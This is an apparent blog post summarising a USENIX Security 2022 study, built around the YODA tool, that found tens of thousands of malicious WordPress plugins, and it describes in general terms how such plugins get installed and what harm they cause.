About the insecurity of Content Management System Plugins
YODA is a name that evokes pleasant memories for many...
In reality, we're not talking about Star Wars here, but about Content Management Systems (CMS)... the double-edged sword of the Web...
(spoiler: I'll explain at the end of the post what Master YODA has to do with #cms)
Why they are useful?
CMSs are widely used tools because they allow for the rapid construction of applications and websites, even of considerable complexity, effectively hiding most of the implementation details and without requiring writing code from scratch.
This is made even easier by the vast ecosystem of plugins, which allow for easy extension of CMS functionalities. These plugins can be obtained from various types of stores, such as:
·     https://themeforest.net
·     https://codecanyon.net
·     https://easydigitaldownloads.com
So far, so good.
Where is the problem, then?
Some may have already guessed where I'm going with this...
Guess what criteria users base their plugin selection on?
Once they identify the plugins that can offer the necessary functionalities, users mainly base their choice on two criteria, which are essentially 1) the popularity of the plugins and 2) user reviews from those who have already used them. Only the most security-conscious users, as a sub-criterion to the two mentioned above, check for any vulnerabilities present in the plugins (#WPScan https://wpscan.com/plugins is a useful tool in this regard). Clearly, they are not without risks...
The threat
A paper published recently by Georgia Tech in USENIX Security analyzed the backups of 400k WordPress sites, backed up between 2012 and 2020 on CodeGuard, and found the presence of 47k malicious plugins distributed across 25k sites.
How did the malicious plugins end up on the sites?
Mainly through two ways. In some cases, it was the site owner who installed them. They did so by searching for free versions of paid plugins on third-party sites (which conveniently come with malicious code) or by downloading from legitimate marketplaces plugins compromised by an attacker.
In other cases, the web server or CMS was compromised at some level, allowing for the loading of malicious plugins.
What are the damages?
The range of damages that plugins can cause is extensive. It includes opening backdoors, executing code, injecting (malicious) posts into site pages or user-downloaded content, and even engaging in actions such as blackhatSEO or cryptomining.
For those who want to satisfy their appetite for details,
I refer you to the USENIX '22 pages with links to the paper and video here: https://www.usenix.org/conference/usenixsecurity22/presentation/kasturi
P.S. The tool used for the analysis is called YODA, hence the attached image to the post.